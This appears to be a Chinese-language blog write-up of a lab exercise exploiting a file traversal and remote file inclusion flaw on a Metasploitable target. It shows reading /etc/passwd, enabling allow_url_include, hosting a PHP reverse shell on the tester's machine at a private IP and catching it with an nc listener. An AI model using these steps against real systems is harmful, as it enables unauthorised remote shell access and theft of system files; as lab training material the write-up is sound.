title: 文件遍历漏洞实验
tags: web渗透
categories: 渗透测试
  1. 环境搭建 测试机ip:192.168.86.135 靶机metasploittable的ip:192.168.86.128 靶机编辑php.ini文件

sudo vim /etc/php5/cgi/php.ini  //编辑php配置文件

找到allow_url_include这一行把Off改成On,

sudo /etc/init.d/apache2 restart //重启apache服务 
  1. 发起攻击

  • 尝试文件/etc/passwd遍历查看,成功。 文件遍历漏洞实验

  • 尝试定位url链接,成功 文件遍历漏洞实验

  • 测试机开启apache服务,制作php反弹shell,使其定位其链接http://192.168.86.135/1.php

cp /url/share/webshells/php/php-reverse-shell.php /var/www/html/1.php  //复制成1.php到web目录下  
vim 1.php //修改127.0.0.1成测试机ip完成保存  
service apache2 start  //开启apache服务<br>
nc -nvvlp 1234  //nc开启监控端口
​

文件遍历漏洞实验文件遍历漏洞实验文件遍历漏洞实验

 

相关文章: